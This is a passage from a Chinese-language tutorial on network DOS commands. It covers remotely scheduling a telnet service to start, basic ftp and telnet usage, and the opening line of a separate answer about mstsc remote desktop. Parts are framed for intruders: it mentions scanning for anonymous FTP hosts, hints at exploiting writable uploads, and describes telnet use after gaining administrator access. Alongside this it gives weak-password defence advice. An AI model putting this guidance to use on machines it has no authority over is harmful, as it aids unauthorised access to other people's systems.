表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務（這里net start telnet即為開啟telnet服務的命令）。

七，ftp

大家對這個命令應該比較熟悉了吧？網路上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去。現在如果你掃到了一台開放 ftp服務的主機（一般都是開了21埠的機器），如果你還不會使用ftp的命令怎麼辦？下面就給出基本的ftp命令使用方法。

首先在命令行鍵入ftp回車，出現ftp的提示符，這時候可以鍵入「help」來查看幫助（任何DOS命令都可以使用此方法查看其幫助)。

大家可能看到了，這么多命令該怎麼用？其實也用不到那麼多，掌握幾個基本的就夠了。

首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入「open 主機IP ftp埠」回車即可，一般埠默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。

用戶名和密碼都是ftp，密碼是不顯示的。當提示**** logged in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。

接下來就要介紹具體命令的使用方法了。

dir 跟DOS命令一樣，用於查看伺服器的文件，直接敲上dir回車，就可以看到此ftp伺服器上的文件。

cd 進入某個文件夾。

get 下載文件到本地機器。

put 上傳文件到遠程伺服器。這就要看遠程ftp伺服器是否給了你可寫的許可權了，如果可以，呵呵，該怎麼 利用就不多說了，大家就自由發揮去吧。

delete 刪除遠程ftp伺服器上的文件。這也必須保證你有可寫的許可權。

bye 退出當前連接。

quit 同上。

八，telnet

功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼？它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以 administrator身份連接了遠程機器後，就可以用它來干你想乾的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。

然後在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。

當輸入用戶名和密碼都正確後就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的許可權，利用DOS命令就可以實現你想乾的事情了。這里我使用的超級管理員許可權登陸的。

到這里為止，網路DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網管一個印象，讓其知道熟悉和掌握網路DOS命令的重要性。其實和網路有關的 DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網管有所幫助。學好DOS對當好網管有很大的幫助，特別的熟練掌握了一些網路的DOS命令。

另外大家應該清楚，任何人要想進入系統，必須得有一個合法的用戶名和密碼（輸入法漏洞差不多絕跡了吧），哪怕你拿到帳戶的只有一個很小的許可權，你也可以利用它來達到最後的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防禦弱口令入侵的方法。

『捌』 遠程登陸的DOS命令是什麼

1、桌面連接命令 mstsc /v: 192.168.1.250 /console